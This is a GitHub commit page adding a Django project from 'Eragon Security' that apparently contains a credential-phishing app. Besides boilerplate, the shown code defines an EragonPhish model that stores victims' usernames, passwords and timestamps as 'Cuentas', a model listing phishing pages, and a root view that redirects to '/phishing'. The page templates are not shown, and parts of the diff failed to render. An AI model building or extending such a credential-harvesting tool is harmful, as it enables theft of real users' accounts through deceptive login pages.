-
Notifications
You must be signed in to change notification settings - Fork 48
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Eragon Security
committed
Dec 21, 2020
1 parent
10586e2
commit 453324d
Showing
1,907 changed files
with
182,131 additions
and
1,571 deletions.
There are no files selected for viewing
Large diffs are not rendered by default.
Oops, something went wrong.
Empty file.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,3 @@ | ||
from django.contrib import admin | ||
|
||
# Register your models here. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,5 @@ | ||
from django.apps import AppConfig | ||
|
||
|
||
class AppConfig(AppConfig): | ||
name = 'app' |
Empty file.
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,3 @@ | ||
from django.db import models | ||
|
||
# Create your models here. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,3 @@ | ||
from django.test import TestCase | ||
|
||
# Create your tests here. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,8 @@ | ||
from django.urls import path | ||
from . import views | ||
|
||
app_name = "app" | ||
|
||
urlpatterns = [ | ||
path("", views.inicio_principal, name="inicio_principal") | ||
] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,5 @@ | ||
from django.shortcuts import render, redirect | ||
|
||
# Create your views here. | ||
def inicio_principal(request): | ||
return redirect('/phishing') |
Empty file.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,6 @@ | ||
from django.contrib import admin | ||
from .models import EragonPhish, ListaDePaginas | ||
|
||
# Register your models here. | ||
admin.site.register(EragonPhish) | ||
admin.site.register(ListaDePaginas) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,5 @@ | ||
from django.apps import AppConfig | ||
|
||
|
||
class AppConfig(AppConfig): | ||
name = 'app' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,28 @@ | ||
# Generated by Django 3.1.4 on 2020-12-12 20:19 | ||
|
||
from django.db import migrations, models | ||
|
||
|
||
class Migration(migrations.Migration): | ||
|
||
initial = True | ||
|
||
dependencies = [ | ||
] | ||
|
||
operations = [ | ||
migrations.CreateModel( | ||
name='EragonPhish', | ||
fields=[ | ||
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), | ||
('username', models.TextField()), | ||
('password', models.TextField()), | ||
('tiempo', models.DateTimeField(auto_now_add=True)), | ||
('slug', models.SlugField()), | ||
], | ||
options={ | ||
'verbose_name': 'Cuenta', | ||
'verbose_name_plural': 'Cuentas', | ||
}, | ||
), | ||
] |
23 changes: 23 additions & 0 deletions
23
eragonprojects/app_phishing/migrations/0002_auto_20201213_2141.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,23 @@ | ||
# Generated by Django 3.1.4 on 2020-12-13 21:41 | ||
|
||
from django.db import migrations, models | ||
|
||
|
||
class Migration(migrations.Migration): | ||
|
||
dependencies = [ | ||
('app_phishing', '0001_initial'), | ||
] | ||
|
||
operations = [ | ||
migrations.AlterField( | ||
model_name='eragonphish', | ||
name='password', | ||
field=models.CharField(max_length=500), | ||
), | ||
migrations.AlterField( | ||
model_name='eragonphish', | ||
name='username', | ||
field=models.CharField(max_length=500), | ||
), | ||
] |
23 changes: 23 additions & 0 deletions
23
eragonprojects/app_phishing/migrations/0003_auto_20201213_2150.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,23 @@ | ||
# Generated by Django 3.1.4 on 2020-12-13 21:50 | ||
|
||
from django.db import migrations | ||
|
||
|
||
class Migration(migrations.Migration): | ||
|
||
dependencies = [ | ||
('app_phishing', '0002_auto_20201213_2141'), | ||
] | ||
|
||
operations = [ | ||
migrations.RenameField( | ||
model_name='eragonphish', | ||
old_name='password', | ||
new_name='passw', | ||
), | ||
migrations.RenameField( | ||
model_name='eragonphish', | ||
old_name='username', | ||
new_name='user', | ||
), | ||
] |
20 changes: 20 additions & 0 deletions
20
eragonprojects/app_phishing/migrations/0004_listadepaginas.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,20 @@ | ||
# Generated by Django 3.1.4 on 2020-12-14 17:24 | ||
|
||
from django.db import migrations, models | ||
|
||
|
||
class Migration(migrations.Migration): | ||
|
||
dependencies = [ | ||
('app_phishing', '0003_auto_20201213_2150'), | ||
] | ||
|
||
operations = [ | ||
migrations.CreateModel( | ||
name='ListaDePaginas', | ||
fields=[ | ||
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), | ||
('name', models.TextField()), | ||
], | ||
), | ||
] |
Empty file.
Binary file added
BIN
+822 Bytes
eragonprojects/app_phishing/migrations/__pycache__/0001_initial.cpython-38.pyc
Binary file not shown.
Binary file added
BIN
+652 Bytes
eragonprojects/app_phishing/migrations/__pycache__/0002_auto_20201213_2141.cpython-38.pyc
Binary file not shown.
Binary file added
BIN
+616 Bytes
eragonprojects/app_phishing/migrations/__pycache__/0003_auto_20201213_2150.cpython-38.pyc
Binary file not shown.
Binary file added
BIN
+683 Bytes
eragonprojects/app_phishing/migrations/__pycache__/0004_listadepaginas.cpython-38.pyc
Binary file not shown.
Binary file added
BIN
+170 Bytes
eragonprojects/app_phishing/migrations/__pycache__/__init__.cpython-38.pyc
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,25 @@ | ||
from django.db import models | ||
|
||
# Create your models here. | ||
class EragonPhish(models.Model): | ||
user = models.CharField(max_length=500, null=False, blank=False) | ||
passw = models.CharField(max_length=500, null=False, blank=False) | ||
tiempo = models.DateTimeField(auto_now_add=True) | ||
slug = models.SlugField() | ||
|
||
def __str__(self): | ||
return self.slug | ||
|
||
class Meta: | ||
verbose_name = "Cuenta" | ||
verbose_name_plural = "Cuentas" | ||
|
||
class ListaDePaginas(models.Model): | ||
name = models.TextField() | ||
|
||
def __str__(self): | ||
return self.name | ||
|
||
def get_absolute_url(self): | ||
return self.name | ||
|
Oops, something went wrong.